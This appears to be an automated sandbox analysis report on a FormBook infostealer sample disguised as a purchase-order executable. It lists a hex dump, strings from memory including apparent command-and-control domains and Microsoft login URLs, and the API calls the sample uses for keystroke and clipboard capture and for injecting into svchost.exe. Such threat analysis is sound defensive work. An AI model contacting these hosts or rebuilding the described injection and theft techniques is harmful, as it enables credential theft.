2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: olMdMEBIcgVB.exe, 00000006.00000002.3893435430.00000000054A7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.54248711.xyz
                Source: olMdMEBIcgVB.exe, 00000006.00000002.3893435430.00000000054A7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.54248711.xyz/jm2l/
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Matteicapital.online
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxw
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Capital_Investment_Advisors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEh
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimx
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Raising_Capital_for_Business.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WE
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Working_Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3893996430.0000000008440000.00000004.00000800.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns
                Source: pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006750000.00000004.10000000.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003D40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: pcaui.exe, 00000004.00000002.3891302705.00000000035F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: pcaui.exe, 00000004.00000002.3891302705.0000000003619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: pcaui.exe, 00000004.00000002.3891302705.00000000035F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: pcaui.exe, 00000004.00000002.3891302705.00000000035F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10337B
                Source: pcaui.exe, 00000004.00000002.3891302705.00000000035F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: pcaui.exe, 00000004.00000002.3891302705.00000000035F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: pcaui.exe, 00000004.00000003.2342220882.00000000086CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: pcaui.exe, 00000004.00000002.3892630131.00000000065BE000.00000004.10000000.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000003BAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                Source: pcaui.exe, 00000004.00000002.3894074077.00000000086EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: pcaui.exe, 00000004.00000002.3892630131.0000000006108000.00000004.10000000.00040000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.00000000036F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00436B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00436B0C
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00436D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00436D07
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00436B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00436B0C
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00422B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00422B37
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0044F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0044F7FF

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.2470000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2470000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3892074167.0000000005060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3893435430.0000000005420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3891158073.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2152031771.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2151673772.0000000002470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3892013013.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3891999951.0000000003140000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2152486099.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: This is a third-party compiled AutoIt script.0_2_003E3D19
                Source: PO #2411071822.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: PO #2411071822.exe, 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2505107b-1
                Source: PO #2411071822.exe, 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: ASDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_399008bb-1
                Source: PO #2411071822.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_41ab5eec-0
                Source: PO #2411071822.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b5c2cd55-f
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0249C893 NtClose,2_2_0249C893
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0247193A NtProtectVirtualMemory,2_2_0247193A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,2_2_03072C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00426606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00426606
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0041ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0041ACC5
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004279D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004279D3
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0040B0430_2_0040B043
